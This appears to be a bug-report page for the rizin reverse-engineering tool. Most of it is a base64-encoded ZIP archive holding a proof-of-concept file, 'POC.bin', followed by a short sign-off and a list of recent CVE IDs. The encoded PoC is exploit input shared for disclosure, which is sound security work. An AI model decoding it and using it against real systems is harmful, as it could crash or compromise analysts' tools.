ZdlL8pHSn4Yf3f8o339EXvGetPKfkb83fWp8sLtUf7anmkI98YnB78VzBhsZSodO6y2Cxs9wUIUJ 4vi673eI3/4Ef3UYvgr3GtwncY9/E34L9y4cLyr9U+/+a6b0MxA0H8aUWmbRuCnkrVtm1firS1kU Pd7iqHan0w911NQtx+Aod/m9GBVCwa2FjmLBVjjT4RB0V8d9oRFz7Vb6vaFf4w9hkS56Jhr9E2Ap 4EnA/euj0a2Y168B0ve+vQmYCsfwNuDzmOBhwOOAJwDXYKJ/CLgL8BRgG7Q1QFfyi1sB14DfMxug N/Ahz0NHQCtgA+BkwFWARwGfB3xiE2JawKY/RKN05m8/YpNDgD68LV0RDz6ATwLuB3we8CRgJ+Dk fagHWAR4GvAhwGkJaG8/XmYCGg6ATjjgoAHgA5gFuB/QCXgUcDGg4SD+2gHQCtgCuBWwE7AIsRU5 tFLAIYBNgKmA1kM4Vg2YC1hM+YCVgD7ARsAhOBi0DvAZwC7ArYAnAY8CGgeiPRyJGg44BDADcDJg LmARYDGgD7AScOub6KdE1APcAeh7C/oCFnWBTxLogFZAA77tLwdwMmARYC5gOWAT4CrAZwDbiH4E MQTgE4CdgFsBj1P9t8FvEOoDZgAWAToBHwKsBLTiTznWEg74J8CjgOeI/g70GAz+gEWAhndhR8Am wCcATwIeJ/pf8OxhUr57X3f3PEHXkKy7etAA42qdSB+O2/JsNDqBvQgdkCytjZNxpzwNu9I6YUqe ZUq5xZy0zNgo3HzVjddPso4CldVfiLsW41r6nQCJ7sNdDnqtXqGn4l6Fuw3tzaPFaZYpuVU/15Sy Ks5mstxvyDOlBuLnmtbpeNkNuLf+FidYqHK+Kfl+vc2UEojLNVn0NYmmlJmmZJvJaEtiv1FwFPeT NO5Vv3V3GvcTKtp43IN0aB+0pwSx/VUyz7vB0mZKnkEslRhhGspbnotGn2UbIqbkgF7vTzQZZyXN S5QLTsNNf963AeUOswdgkjWX+M6CrEXEmMk6O6leTtuT6qSkj+RE/eKN0ejcy4HMMCV/U59nSvlG XJ7J0mqYYUpdFW8zZdyfYDNlBQbcYurWxRUnmE7rbjE16vNNLfoZptX6O0B1JZqyck0ZNlPqDJNl hillBlcnbnciSheg9GyUzkXpO1Ga6XfxuEBOYMD9CaviWw3fiPumnmzJbWf8TTQaLyjxSzEyTyIW fEwnyTyDZJ5BMueRzLkkcy7JPNu0WP9tU/kiU+1sU8NsU6PudtPie0zlC0y1s0wNucDnmhbP7VX6 vCTB0ruci9ViJvMxU/FrLiPHz0HGbsTd2er+vp/6O2D4stThXMfUOMwZxOpDVWNoWhyghlYA2nDQ slU08rN20Iap5gD53CLQvkAEuym5Di0N6V2X5GQ+F3+1TpG/APfzcYDg0cDl/6beIY8LxcY20cYF 803FC0yLHaZym6l2ninLdpE1hVKSFz5+BXhG+uJpU/dbmal8vql2pqlhBrqp0LS42FQ+k3VbAfCF psW399ZrzCYNaMeAZwSTev4b8AHat4ngpP6wU3/YqD/0d8sdwupvoLUIZa9U2XkXaI2gJatoXaQP aMNVtJOgtYCWooqLjbRWgfag2B/4Nic2h/vqkwKpT0Y+TX2i8CkAchx8WiU+9yXKfshJbf9KLs9o jUCcr8TK/BBodtCuUPF9ktZU0H4g8f2mwncr8g4hb4iKxyHQjr4SOzaPg9b9imLzFP6QQfsmj0h8 gwrfc7gdv4rVLwPlFyIWeFQq/3Wl/HjM9Ws0+i1G+V2dsfr5QNsB2tUqWksCxRix/bkGtC5N3XWg /alT7jtRf9DCmrqHQDvZyfud+/bj9ECFfTabQRrbik+aofVJtfqoqaEIwxhuEc50tc5helSXZ2oD rM1N7G3+5Cbpv5hoarg16Q5kO0wZuabU2apsZ9KXQJ9tynCaUnNjnNgSkX5rLH1uUpmpIQ8CfNHU YNO2qVT2ocncpAZTwwIUdZhaIOPqS8o4GxXykvrwm7W9+c1b18b26WQj5gviOYtqXNiNYoz3TXFc 1Oq/Ko4LKlOKvBbk7ZPXyXxTu06/MZEv0lS/hWI3xH5NvMz9ev0yk1Hk/QTgBuRdI9cvZMxJlnbk PY+8MZS3WPSV+0E7BFqC6jd1w0YxxrxJ5rEYPOYk2RknUa9BAzE/VLyGUN2BoB/kcukXmpKdJiPR s0BvAr2Y0QtNydL8B30X6CPkNeVWk5HnUfzYibyJlDfHlOzibVtJf+SdRF66XC+XfN8tJgv87y2s 7xiPdSh3DuWulO0Egbgv2jUQH6/yNSWPGXceBJPjkOPIt7xKfSTFV3lyfJVL8dVsU45+ViIbhjZp xNySJMdH4xMRz6G+p5f10idHSLOSpD2chSi/DuXziQAdvNB3ZpIi7wrkdyF/Ghszoj1mJ81h+ZNp /ifSRMYeey/tKRGZPWmxnM5PIr77Ua+YTtbLNvpSIuUVgjPpcRL5Lcj3yvmYp3MxGnNJXX2uNC6l 33GmeP4Qynsuuc7aRb+RU93r2jqE+p84vibNJWU+NYF+GvwvF/qv/qv/6r/6r/6r/+q/+q/+q//q v/qv/qv/+l+8pN+xX8fhw+7Y36X/MYfrONzE4R4O93G4nkHld+LfYLhy6TRwEIfSC5LBHC2dL8Jh Quzv7l+tOWtylRD7+/vDNfn4QZ4a9ZmVeM1ZkgTN2ZREjr+vF2GS5kzKUI3d4jhseUyEeo4/yTOG cHwAh1dyuM4sKavIWswrD9S0eY1Gp7NRUScdJ13g+GluzKiUL/Utxxt5/iccTxb+Pdeja3qnZ/A+ zuGwgMPFHNZy2Mjhag7bOFzHYTuHnRx2cdjNoPJD5MkcWjjM4DCHwwIOF3NYy2Ejh6s5bONwHYft HHZy2MVhN4fCKN4+hxYOMzjM4bCAw8Uc1nLYyOHqUcI/dRnbRDjaHTvXjMI/d0n1a9t6z+ji9CmT pk6dlDUx21N6g9td6p7sys6c5HJNnXRDWVl2ZunErIwbJmWVTUkv9eCUFZX/7raFTiHdW47DSz7X EiG9ohqnpGqF9Ooan4cdicFRcJxT8i1XkZb4KypL0ypKOck2w5Hmcy0VWF65y1supJcur/Yur2IQ jMUcfhgrBilBXp2n0kUFeaq20kdSVOATyfSlNTzh9biFdJ+nAWgZslG6BqdnXEK6p7ykrM5V5Skp L61TMJFHiauuzrVcrCGlqRY1BQZMQFdVBTiLvJZ4vUy+EmYf/HHDXcI/eD3VhrOdv49GCT71FM5U Pk44QRFf+yPCCYr4L39MOEER/9UThBMU8ad/grprxX+EP/VTzv+nnP/PCCfI+T9JOEHO/+eEE+T8 nyKcIOf/C8JFyPivJZwg5/9Lwgly/r8iXITPvyieGX0c53nad2pvokv3xXQF/mO3mqd2Guj5WmDg a0wC9/lG0Z/TEcLUMexvDxKRZiB15jj1MbO+z5G6uE+nNhQ/rsB6zTlMvQZW8zVCwk8PioWLBe05 zNhrpaiXcg51sAbq1e1ffI7zAV5/hrz2xcIn45T6w3qp/yCXK0GOFWLh1X/nHOsqTX2LJRY26mPL J2vgI5r6baMkKJW7dP02Tf11o2Jh7d9p/+da+cfEwhkZ2vqx19Oa+qXzY+Hgv2O/Z5UxzgdMLHSa pIzezxVv0tR3VsfCJv2l239JU7+zNhY+mnTpc9QHcJOIcZpYMmNV7+WNGvhn3GZV/aw1HH7K+ieY /Er9nDUc8vrFwqXtd4b3XZwmvnqU1+/WxcaYRs04+L6m/ZbHOPyGCBt0l5Y/ThdbX2jjcDWfP39H /oEsUFXqN7ZxyOs/qrt0fRNvX7li60++1PiVdb/4eobXH6G79Dn+vwFQSwECPwMUAwAACAB6uu5S GAb/B6sxAABMmQAABwAkAAAAAAAAACCAtIEAAAAAUE9DLmJpbgoAIAAAAAAAAQAYAIAl9EUoedcB ANjaVCh51wGAJfRFKHnXAVBLBQYAAAAAAQABAFkAAADQMQAAAAA= I use rizin a lot and I am looking forward to seeing this fixed. Thanks! - netspooky

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda
CVE-2023-6905
CVE-2023-6903
CVE-2023-6904
CVE-2023-3907